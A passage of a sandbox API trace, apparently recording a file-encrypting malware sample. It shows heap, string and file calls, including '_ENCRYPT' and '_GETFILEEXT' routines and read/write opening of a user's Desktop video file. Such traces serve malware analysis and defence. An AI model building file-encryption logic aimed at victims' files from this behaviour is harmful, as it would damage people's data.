wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0168.357] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.357] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0168.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.358] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0168.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0168.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0168.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0168.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0168.359] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0168.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.360] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.362] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0168.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0168.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.362] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0168.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0168.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.363] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0168.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0168.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", cchWideChar=50, lpMultiByteStr=0x90ad98, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", lpUsedDefaultChar=0x0) returned 50 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.365] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y8qf6zl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0168.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=50, lpWideCharStr=0x8e8320, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv") returned 50 [0168.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0168.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.366] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.367] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.367] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.367] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.367] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.368] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.368] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.368] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.368] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.368] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0168.368] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.369] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.369] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0168.369] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.370] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.370] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8858920, ftCreationTime.dwHighDateTime=0x1d5dd7c, ftLastAccessTime.dwLowDateTime=0x52b3ff80, ftLastAccessTime.dwHighDateTime=0x1d5dff4, ftLastWriteTime.dwLowDateTime=0x52b3ff80, ftLastWriteTime.dwHighDateTime=0x1d5dff4, nFileSizeHigh=0x0, nFileSizeLow=0x4db6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Y8qF6zL.mkv", cAlternateFileName="")) returned 0x90add8 [0168.370] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.370] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0168.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.371] FindFirstFileW (in: 